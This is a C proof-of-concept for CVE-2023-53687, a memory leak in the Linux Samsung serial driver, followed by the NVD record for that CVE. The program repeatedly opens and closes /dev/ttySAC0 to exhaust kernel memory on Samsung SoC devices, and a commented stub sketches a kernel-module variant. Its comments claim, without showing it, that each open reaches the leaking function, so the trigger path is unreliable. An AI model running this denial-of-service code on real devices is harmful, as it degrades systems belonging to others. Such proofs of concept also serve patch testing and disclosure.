CVE-2023-53687

// PoC for CVE-2023-53687 - Linux Kernel Samsung TTY Driver Memory Leak // This PoC demonstrates how to trigger the memory leak in s3c24xx_serial_getclk() // by repeatedly opening and closing the serial port device on affected Samsung SoCs. #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <errno.h> #define SERIAL_DEVICE "/dev/ttySAC0" #define ITERATIONS 100000 int main(int argc, char *argv[]) { int fd; int i; const char *device = SERIAL_DEVICE; if (argc > 1) { device = argv[1]; } printf("[*] CVE-2023-53687 PoC - Samsung TTY Driver Memory Leak\n"); printf("[*] Target device: %s\n", device); printf("[*] Iterations: %d\n", ITERATIONS); // Check if device exists if (access(device, F_OK) != 0) { fprintf(stderr, "[-] Device %s not found. This PoC requires Samsung SoC hardware.\n", device); fprintf(stderr, "[-] Error: %s\n", strerror(errno)); return 1; } printf("[*] Starting memory leak trigger...\n"); // Repeatedly open and close the serial device to trigger s3c24xx_serial_getclk() // Each open call invokes the clk lookup path, leaking memory on vulnerable kernels for (i = 0; i < ITERATIONS; i++) { fd = open(device, O_RDWR | O_NOCTTY | O_NDELAY); if (fd < 0) { fprintf(stderr, "[-] Failed to open %s at iteration %d: %s\n", device, i, strerror(errno)); continue; } // Close immediately to trigger cleanup path close(fd); if (i % 10000 == 0 && i > 0) { printf("[+] Completed %d iterations\n", i); } } printf("[*] Done. Check kernel memory usage with 'dmesg' or /proc/meminfo\n"); printf("[*] On vulnerable kernels, slab memory for 'clk' objects will increase\n"); return 0; } /* * Alternative kernel module approach (requires root): * * #include <linux/module.h> * #include <linux/serial_core.h> * // Trigger s3c24xx_serial_getclk() repeatedly via uart_get_rate() * // Each call leaks clk references that are never put. */

{"cve": {"id": "CVE-2023-53687", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:53.033", "lastModified": "2026-02-26T23:10:18.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: samsung_tty: Fix a memory leak in s3c24xx_serial_getclk() when iterating clk\n\nWhen the best clk is searched, we iterate over all possible clk.\n\nIf we find a better match, the previous one, if any, needs to be freed.\nIf a better match has already been found, we still need to free the new\none, otherwise it leaks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3", "versionEndExcluding": "4.14.322", "matchCriteriaId": "1008F58D-2D01-4D23-99B8-77F4C775344E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": "43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.40", "matchCriteriaId": "69315BCC-36D2-45CD-84F8-381EDF8E38F3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.5", "matchCriteriaId": "923F6AEA-C2EF-4B08-B038-69A18F3D41F8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/01dd8a43a84616c830782166ba3cceb01ad95363", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1962717c4649e026a4252fe6625175affd28a593", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1f426293fef1c13742b2a685bf7e363f51f6ee03", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/46574e5a0a2aee41e6ebb979cfe1dbaea8693e16", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/832e231cff476102e8204a9e7bddfe5c6154a375", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/933e5b2998bc3a527d15efbf1e97c9e63297aa3c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9dd8091959bc41fee51d0827276a2b982e84adf0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f0bf102ef9b05d7294bd8d506755465f6867d944", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}